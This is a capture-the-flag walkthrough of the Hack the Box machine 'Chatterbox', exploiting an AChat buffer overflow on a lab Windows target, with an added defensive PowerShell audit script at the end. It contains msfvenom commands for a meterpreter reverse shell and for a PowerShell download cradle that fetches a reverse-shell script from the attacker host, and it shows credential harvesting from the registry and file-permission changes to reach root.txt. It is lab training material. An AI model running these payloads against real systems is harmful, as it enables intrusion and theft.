Hack the Box – Chatterbox Walkthrough

Today, we’re going to solve another CTF machine, “Chatterbox”. It is now a retired box and is accessible to VIP members.
Specifications
• Target OS: Windows
• Services: 9255, 9256
• IP Address: 10.10.10.74
• Difficulty: Medium
Contents
• Getting user
• Getting root
Enumeration
As always, the first step is the reconnaissance phase, starting with port scanning.
Ports Scanning
During this step we’re gonna fingerprint the target to see what is running behind the IP address.
nmap -p 1-65535 -T4 -A -v 10.10.10.74
Enumerating Port 9255
Nmap reveals an AChat service running over HTTP.
We got nothing here, let’s move ahead.
Enumerating Port 9256
We know there’s an AChat application installed. To find its version we could try banner grabbing, but in this case it didn’t work.
Let’s run searchsploit achat.
Exploit: Achat 0.150 beta7 – Remote Buffer Overflow
searchsploit -m exploits/windows/remote/36025.py
Let’s edit our exploit.
Exploitation
Exploit: https://www.exploit-db.com/exploits/36025
Method #1
Let’s create our payload first and insert it into the exploit.
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1337 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
We executed our exploit and started listening for our reverse shell.
The reverse shell kept getting closed, so we migrated to another process immediately on execution.
set AutoRunScript post/windows/manage/migrate
System Information
Method #2
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.27:8000/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
However, the Metasploit shell is much more convenient.
The user flag can be found here: C:\Users\Alfred\Desktop\user.txt
Privilege Escalation
Let’s start with some basic priv esc enumeration.
Running through the basic checks with the PowerUp.ps1 script turned up AutoLogon credentials stored in the registry.
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
DefaultUserName: Alfred DefaultPassword: Welcome1!
There’s a possibility that the password is reused for Administrator. But since we already have read access to the Administrator directory as user Alfred, as the output below shows, we don’t need it.
We can change the permissions on root.txt using cacls.
C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                               CHATTERBOX\Administrator:(OI)(CI)(ID)F
                               BUILTIN\Administrators:(OI)(CI)(ID)F
                               CHATTERBOX\Alfred:(OI)(CI)(ID)F

C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
Are you sure (Y/N)?y
processed file: C:\Users\Administrator\Desktop\root.txt

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Alfred:R
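As an added defender-side example (my own script, not part of the original walkthrough), the following read-only audit surfaces the two weaknesses this box turns on: a cleartext DefaultPassword under the Winlogon key, which is what PowerUp reported, and a non-admin principal holding rights on another user’s profile, which is what let Alfred reach Administrator’s Desktop. It assumes an elevated PowerShell prompt on the host being checked; the Winlogon registry path is the standard one and no Chatterbox-specific names are hard-coded.

```powershell
# Added example, not from the walkthrough: read-only audit for the two weaknesses
# this box relies on. Run from an elevated PowerShell prompt on the host to check.

$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Test-AutoLogonSecret {
    # Reports a cleartext DefaultPassword under the Winlogon key (what PowerUp found).
    $p = Get-ItemProperty -Path $WinlogonKey -ErrorAction SilentlyContinue
    if ($null -ne $p -and -not [string]::IsNullOrEmpty($p.DefaultPassword)) {
        [pscustomobject]@{
            Finding = 'Cleartext AutoLogon password in registry'
            Account = $p.DefaultUserName
            Active  = ($p.AutoAdminLogon -eq '1')
            Fix     = 'Delete DefaultPassword and set AutoAdminLogon to 0 unless required'
        }
    }
}

function Test-ProfileAcl {
    # Reports Allow ACEs on a user profile granted to anyone other than SYSTEM,
    # Administrators or the profile owner (e.g. a second user on Administrator's profile).
    param([string]$ProfileRoot = 'C:\Users')
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    Get-ChildItem -Path $ProfileRoot -Directory |
        Where-Object { $_.Name -notin @('Public', 'Default') } |
        ForEach-Object {
            $dir = $_
            $acl = Get-Acl -Path $dir.FullName
            foreach ($ace in $acl.Access) {
                $id = $ace.IdentityReference.Value
                if ($ace.AccessControlType -ne 'Allow') { continue }
                # Identity is "MACHINE\user" or "DOMAIN\user"; the owner's own ACE is fine.
                if ($id -in $trusted -or $id -like "*\$($dir.Name)") { continue }
                [pscustomobject]@{
                    Finding   = 'Foreign principal on user profile'
                    Profile   = $dir.FullName
                    Identity  = $id
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
}

Test-AutoLogonSecret | Format-List
Test-ProfileAcl | Format-Table -AutoSize
```

On a host configured like this box, the first check reports the Alfred account with an active AutoLogon password, and the second lists the Alfred ACE on the Administrator profile that the cacls output above shows as inherited full control.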